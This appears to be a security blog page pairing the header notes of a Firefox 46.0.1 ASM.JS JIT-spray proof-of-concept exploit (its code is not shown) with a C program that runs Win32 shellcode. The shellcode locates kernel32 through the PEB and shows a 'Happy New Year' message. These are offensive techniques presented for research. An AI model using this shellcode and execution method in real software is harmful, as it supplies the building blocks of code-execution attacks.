Demo Firefox 46.0.1 – ASM.JS JIT-Spray Remote Code Execution

    FULL ASLR AND DEP BYPASS USING ASM.JS JIT SPRAY (CVE-2017-5375)
    *PoC* Exploit against Firefox 46.0.1 (CVE-2016-2819)
    ASM.JS float constant pool JIT-Spray special shown at OffensiveCon 2018
 
    Tested on:
    Firefox 46.0.1 32-bit - Windows 10 1709
    https://ftp.mozilla.org/pub/firefox/releases/46.0.1/win32/en-US/Firefox%20Setup%2046.0.1.exe
 
    Howto:
    1) serve PoC over network and open it in Firefox 46.0.1 32-bit
    2) A successful exploit attempt should pop calc.exe
 
    Mozilla Bug Report:
    https://bugzilla.mozilla.org/show_bug.cgi?id=1270381
 
 
    Writeup: 
    https://rh0dev.github.io/blog/2018/more-on-asm-dot-js-payloads-and-exploitation/
 
 
    - For research purposes only -
     
    (C) Rh0
 
    Mar. 13, 2018
 

Reference:
Firefox 46.0.1 – ASM.JS JIT-Spray Remote Code Execution
https://www.exploit-db.com/exploits/44293/
shellcode2asmjs: Generate arbitrary ASM.JS JIT-Spray payloads
https://github.com/rh0dev/shellcode2asmjs

Happy New Year 2018

Shellcode with Chinese characters, win32/64, Windows 7

2018


/*

               __
               /\/'-,
       ,--'''''   /"
 ____,'.  )       \___
'"""""------'"""`-----'

Happy New Year -  新年快樂

*/
#include <stdio.h>
#include <string.h>

/* Win32 shellcode from the original post, kept byte-for-byte. It reads the
 * PEB via fs:[0x30], walks the loader module list to find kernel32.dll,
 * scans its export name table for "FatalAppExitA" (comparing "Fata" and
 * "Exit"), builds the string "Happy New Year" on the stack and calls
 * FatalAppExitA(0, "Happy New Year"), which shows the message and ends
 * the process. The trailing Chinese characters are appended as their UTF-8
 * bytes (the original's stray backslashes before them were invalid C escape
 * sequences and are dropped); they sit after the final call and are never
 * executed. Only 32-bit Windows is addressed by this byte sequence. */
char shellcode[] = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42\x08"
                   "\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c"
                   "\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b\x34\xaf\x01"
                   "\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e\x08\x45\x78\x69"
                   "\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01"
                   "\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x61\x72\x20\x01\x68\x77\x20\x59"
                   "\x65\x68\x79\x20\x4e\x65\x68\x48\x61\x70\x70\x89\xe1\xfe\x49\x0f"
                   "\x31\xc0\x51\x50\xff\xd7"
                   "新年快樂狗年行大運好運旺旺來";

int main(void)
{
    /* strlen() returns size_t, so %zu is the matching conversion (the
     * original used %ld with an unsigned cast). The count stops at the
     * first NUL byte; this shellcode contains none before the terminator. */
    printf("shellcode length %zu\n", strlen(shellcode));

    /* Jump into the byte array. It lives in writable data, so a process
     * with DEP/NX enforced faults here; the test only runs where the data
     * segment is executable. */
    ((void (*)(void))shellcode)();
    return 0;
}